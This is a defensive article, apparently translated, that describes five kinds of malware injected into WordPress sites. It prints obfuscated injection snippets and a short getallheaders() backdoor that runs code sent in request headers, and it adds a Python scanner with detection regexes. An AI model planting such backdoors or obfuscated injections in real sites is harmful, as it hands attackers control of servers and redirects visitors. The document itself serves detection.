Here are some of the types of malware commonly found embedded in WordPress sites today. If code similar to the examples below appears in a site's files, the site should be suspected of having been hacked and tampered with.


1 @include statement sandwiched between random-string comments

This type of tampering is often seen in core WordPress files such as index.php and wp-config.php.
Specifically, the tampering looks like this:

/*ytju6dyr*/

@include('/home/www/***********/.sd87ywernaksj.mo');

/*ytju6dyr*/

The random strings in the comments above and below the @include statement are identifiers that the malware body uses to check whether its injected line has been removed.
The @ in front of include suppresses errors, so the injected line loads the malware body, .sd87ywernaksj.mo, without raising an error even if that file has already been removed.
In other words, the malware body is .sd87ywernaksj.mo. Because a file name that begins with . is a hidden file on Linux, this file does not show up in an ordinary directory listing.

2 JavaScript using atob or String.fromCharCode

This malware is commonly injected into the theme's header.php and footer.php, which are loaded on every page, and into posts stored in the database. In most cases it is redirect hack code that sends visitors to another site.

Specifically, the tampering looks like this:

document.write(atob(alphanumeric string));
document.write(String.fromCharCode(array of numbers));

atob (Base64 decoding) and String.fromCharCode (building a string from character codes) are conversion functions that make a script unreadable at a glance. The hacker uses them to obfuscate what the injected code does, then writes the decoded code into the HTML with document.write.

However, String.fromCharCode is also often used on Japanese sites to hide e-mail addresses from spam bots, so legitimate uses must be distinguished from malware.

3 A large number of /* */

This malware is often placed among the WordPress core files under a random-string file name.
Example file name: nlcebdto.php

Example of malware code:

/* Unx */chr ( number /*rgv */ number /*rQZu */ number ).chr (number) . /* VbNc */chr (number

This malware is characterized by a large number of /* */ comments scattered through code that is obfuscated with chr(). The many comments are inserted to prevent detection by malware scanners that look for a contiguous signature.

4 A large number of \x-numbered characters

The code of this malware contains a large number of \x-numbered characters (hexadecimal escape sequences), as shown below.

\x3f\x70h\x digits\x20@\x digits\x76a\x digits\x digitsc\x digits$\x5f\x52E\x51\x digitsE\x53\x digits[.

A \x-numbered string is a UTF-8 string converted so that only the program can expand it: it looks unintelligible to a human, and the obfuscation hides what the program does at first glance.
Other common variants use UTF-16 conversion or \u00-numbered escapes.

5 Getting information from $_HEADERS

This malware is simple and looks like the following:

$_HEADERS = getallheaders();
if (isset($_HEADERS['character'])) {
    $char = $_HEADERS['character']('', $_HEADERS['character']($_HEADERS['character']));
    $char();
}

This kind of malware is called a backdoor: whatever code the hacker sends in the HTTP request headers is executed on the server.
However, the key names used in the code above are ordinary words and vary from file to file, which makes this type of tampering difficult to detect.
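As an added example that is not part of the original article, the following Python script applies the five indicators described above to constructed file contents. The regular expressions, thresholds and sample files are assumptions of this example, not signatures from any real scanner, and the thresholds should be tuned per site to limit false positives.

```python
import re

# Heuristic signatures for the five tampering patterns described above.
# Thresholds are assumptions for this example; tune them for your own site.
INCLUDE_BETWEEN_COMMENTS = re.compile(
    r"/\*\s*[A-Za-z0-9]{6,}\s*\*/\s*@include\s*\(\s*['\"]?[^'\")]*/\.[^'\")]+['\"]?\s*\)\s*;"
    r"\s*/\*\s*[A-Za-z0-9]{6,}\s*\*/")
JS_DECODE_THEN_WRITE = re.compile(r"document\.write\s*\(\s*(?:atob|String\.fromCharCode)\s*\(")
SHORT_JUNK_COMMENT = re.compile(r"/\*\s*[A-Za-z0-9]{1,8}\s*\*/")  # e.g. /* Unx */
CHR_CALL = re.compile(r"\bchr\s*\(", re.IGNORECASE)
HEX_OR_U00_ESCAPE = re.compile(r"\\x[0-9A-Fa-f]{2}|\\u00[0-9A-Fa-f]{2}")
HEADERS_DYNAMIC_CALL = re.compile(r"getallheaders\s*\(\s*\)[\s\S]{0,400}?\$\w+\[[^\]]+\]\s*\(")

def scan_text(src):
    """Return the labels of the indicators present in src (empty list if none)."""
    hits = []
    if INCLUDE_BETWEEN_COMMENTS.search(src):
        hits.append("include_between_random_comments")
    # String.fromCharCode alone is also used legitimately (e.g. hiding e-mail
    # addresses from spam bots), so flag it only when fed straight into document.write.
    if JS_DECODE_THEN_WRITE.search(src):
        hits.append("js_decode_then_document_write")
    # Many short junk comments plus several chr() calls: the pattern of type 3.
    if len(SHORT_JUNK_COMMENT.findall(src)) >= 5 and len(CHR_CALL.findall(src)) >= 3:
        hits.append("chr_with_many_junk_comments")
    if len(HEX_OR_U00_ESCAPE.findall(src)) >= 8:
        hits.append("hex_escape_run")
    if HEADERS_DYNAMIC_CALL.search(src):
        hits.append("getallheaders_dynamic_call")
    return hits

# Constructed samples mimicking the patterns above (not real infected files).
SAMPLES = {
    "index.php": "<?php\n/*ytju6dyr*/ @include('/home/www/example/.sd87ywernaksj.mo'); /*ytju6dyr*/\n"
                 "define('WP_USE_THEMES', true);\n",
    "footer.php": '<script>document.write(atob("PGI+Y29uc3RydWN0ZWQ8L2I+"));</script>\n',
    "nlcebdto.php": "<?php echo /* Unx */chr(1/*rgv */0/*rQZu */1)./* VbNc */chr(101)"
                    "./* Qx */chr(108)./* z9 */chr(108)./* pW */chr(111);\n",
    "hex.php": r'<?php $f = "\x3f\x70\x68\x70\x20\x24\x5f\x52\x45\x51";',
    "hdr.php": "<?php\n$_HEADERS = getallheaders();\nif (isset($_HEADERS['character'])) {\n"
               "    $char = $_HEADERS['character']('', $_HEADERS['character']($_HEADERS['character']));\n"
               "    $char();\n}\n",
    # Legitimate e-mail hiding: fromCharCode without document.write stays clean.
    "clean.js": 'var m = String.fromCharCode(105,110,102,111) + "@example.com";\n'
                'document.getElementById("m").textContent = m;\n',
}

def scan_samples():
    """Scan every constructed sample and map its name to the indicators found."""
    return {name: scan_text(src) for name, src in SAMPLES.items()}
```

Running scan_samples() flags each of the five infected samples with exactly its own indicator and reports clean.js as clean.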

All of the above types of malware can be detected by scanning.

Try the [Free] WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].